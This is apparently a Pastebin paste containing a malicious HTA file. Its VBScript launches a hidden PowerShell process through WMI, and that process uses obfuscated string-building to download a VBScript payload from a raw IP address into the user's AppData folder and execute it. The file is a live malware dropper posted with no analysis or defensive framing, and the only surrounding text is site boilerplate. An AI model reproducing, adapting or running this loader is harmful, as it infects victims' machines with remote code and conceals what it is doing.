Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SYSMENU="no" CAPTION="no" />
- <SCRIPT Language="VBScript">
- strCommand = "Powershell $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://142.11.204.173/cbmiconstrutora.com.br/Protected%20Client1.txt'',$env:APPDATA+''\\''+''file.vbs'')'|D; start-process($env:APPDATA+'\\'+'file.vbs')"
- Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
- Set objStartup = objWMIService.Get("Win32_ProcessStartup")
- Set objConfig = objStartup.SpawnInstance_
- objConfig.ShowWindow = 0
- Set objProcess = objWMIService.Get("Win32_Process")
- intReturn = objProcess.Create(strCommand, Null, objConfig, intProcessID)
- self.close
- </SCRIPT>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
